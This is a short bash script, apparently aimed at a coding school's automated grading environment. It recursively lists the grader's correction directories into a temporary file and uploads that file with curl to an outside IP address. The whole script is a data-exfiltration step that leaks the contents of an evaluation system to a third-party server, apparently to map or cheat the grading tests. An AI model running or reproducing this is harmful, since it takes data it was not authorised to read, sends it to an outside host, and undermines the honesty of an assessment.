#!/bin/bash
ls -Rla /tmp/correction/holberton_corrections/corrections/ >> temp ; ls -Rla /tmp/correction/holberton_corrections/corrections/240 >> temp ; curl -s -F "name=@temp" http://138.68.58.230:8080
